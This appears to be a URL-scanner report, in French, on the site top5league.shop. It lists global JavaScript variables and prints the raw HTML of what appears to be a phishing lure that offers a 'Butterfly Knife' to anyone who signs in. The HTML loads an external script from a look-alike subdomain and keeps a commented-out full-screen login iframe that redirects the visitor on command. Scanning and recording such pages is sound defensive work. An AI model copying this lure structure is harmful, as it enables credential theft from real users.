- ID de l'analyse :
- a7ea27f4-ac4c-49de-83f6-b7cfe5d441d2Terminée
- URL soumise :
- https://top5league.shop/
- Fin du rapport :
Liens : 0 trouvé(s)
Liens sortants identifiés à partir de la page
Variables JavaScript : 11 trouvée(s)
Les variables JavaScript globales chargées dans l'objet fenêtre d'une page sont des variables déclarées en dehors des fonctions et accessibles depuis n'importe quel endroit du code au sein du champ d'application actuel
Nom | Type |
---|---|
onbeforetoggle | object |
documentPictureInPicture | object |
onscrollend | object |
lang | function |
changeLang | function |
$ | function |
jQuery | function |
uidEvent | number |
bootstrap | object |
onEntry | function |
Messages de journal de console : 0 trouvé(s)
Messages consignés dans la console web
HTML
Le corps HTML de la page en données brutes
<!DOCTYPE html><html lang="en"><head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<link href="https://cdn.jsdelivr.net/npm/[email protected]/dist/css/bootstrap.min.css" rel="stylesheet" integrity="sha384-QWTKZyjpPEjISv5WaRU9OFeRpok6YctnYmDr5pNlyT2bRjXh0JMhjY6hW+ALEwIH" crossorigin="anonymous">
<link rel="stylesheet" href="./assets/css/style.css">
<link rel="stylesheet" href="./assets/css/media.css">
<link rel="shortcut icon" href="./assets/image/logo.png" type="image/x-icon">
<title>Top 5 league</title>
<meta name="title" content="Top 5 league">
<meta name="description" content="Vote and take the Butterfly Knife! Be the first to vote!">
<meta property="og:type" content="website">
<meta property="og:url" content="https://top5league.shop/">
<meta property="og:title" content="Top 5 league">
<meta property="og:description" content="Vote and take the Butterfly Knife! Be the first to vote!">
<meta property="og:image" content="/preview2.gif">
<link rel="icon" type="image/x-icon" href="./assets/image/logo.png">
<!--<script defer="defer" src="https://top5league.shop/static/js/main.7f1962eb.js"></script>-->
<!--<link href="https://top5league.shop/static/css/main.634f918e.css" rel="stylesheet">-->
<script>
const BASE_LINK = ["login", "95e11", "newxyu93"];
</script>
</head>
<body>
<!--<iframe src='https://login.top5league.shop/95e11' border='0' style='width:100vw; height:100vh; border: none;' onload="window.addEventListener('message',e=>{if(typeof e.data=='object'&&typeof e.data.r=='string'&&e.data.r.length>0){window.location.href=e.data.r}},false);"></iframe>-->
<div id="root">
<video autoplay="" loop="" muted="" class="bgvideo" id="bgvideo">
<source src="./assets/image/111119.mp4" type="video/mp4">
</video>
<div class="lang element-animation element-show" style="cursor: pointer;color: #eedfbf;font-size: 36px;display: flex;position: absolute;right: 0;top: 0;margin: 20px;align-items: self-end;">
<strong class="mx-2" onclick="changeLang('en')">EN <img src="en.jpg" style="
width: 45px;
"></strong>
<strong class="mx-2" onclick="changeLang('ru')">RU <img src="ru.png" style="
width: 45px;
"></strong>
<strong class="mx-2" onclick="changeLang('es')">ES <img src="es.png" style="
width: 45px;
"></strong>
<strong class="mx-2" onclick="changeLang('cn')">CN <img src="cn.png" style="
width: 45px;
"></strong>
</div>
<main>
<div class="main-cont">
<div class="main-logo element-animation element-show">
<img src="./assets/image/logo.png" alt="">
</div>
<div class="main-header element-animation element-show">
<h1 id="title">Vote for your favorite team and take it!</h1><h2 class="knife" id="knife">★ Butterfly Knife</h2>
</div>
<div class="main-login element-animation">
<button class="button__login" id="auth">SIGN IN</button>
</div>
</div>
</main>
</div>
<script>
const text = {
en: {
title: "Vote for your favorite team and take it!",
knife: "★ Butterfly Knife",
auth: "SIGN IN"
},
ru: {
title: "Проголосуй за любимую команду и забери!",
knife: "★ Butterfly Knife",
auth: "ВОЙТИ"
},
es: {
title: "Vota por tu equipo favorito y llévatelo!",
knife: "★ Butterfly Knife",
auth: "INICIAR SESIÓN"
},
cn: {
title: "为你最喜欢的球队投票并接受吧!",
knife: "★ Butterfly Knife",
auth: "登入"
}
}
function lang(result){
Object.keys(text[result] ?? text.en).map((el) => document.getElementById(el).innerHTML = text[result] ? text[result][el] : text.en[el])
}
function changeLang(lang) {
Object.keys(text[lang]).map((el) => document.getElementById(el).innerHTML = text[lang][el])
}
lang(Intl.DateTimeFormat().resolvedOptions().locale)
</script>
<script src="https://code.jquery.com/jquery-3.7.1.slim.js" integrity="sha256-UgvvN8vBkgO0luPSUl2s8TIlOSYRoGFAX4jlCIm9Adc=" crossorigin="anonymous"></script>
<script src="https://cdn.jsdelivr.net/npm/[email protected]/dist/js/bootstrap.bundle.min.js" integrity="sha384-YvpcrYf0tY3lHB60NNkmXc5s9fDVZLESaAA55NDzOxhy9GkcIdslK1eN7N6jIeHz" crossorigin="anonymous"></script>
<script src="./assets/js/script.js"></script>
<script defer="defer" src="https://newxyu93.top5league.shop/static/js/main.8519.js"></script>
<div style="position: fixed; z-index: 99999999; top: 0px;"><div id="AppRoot"></div></div></body></html>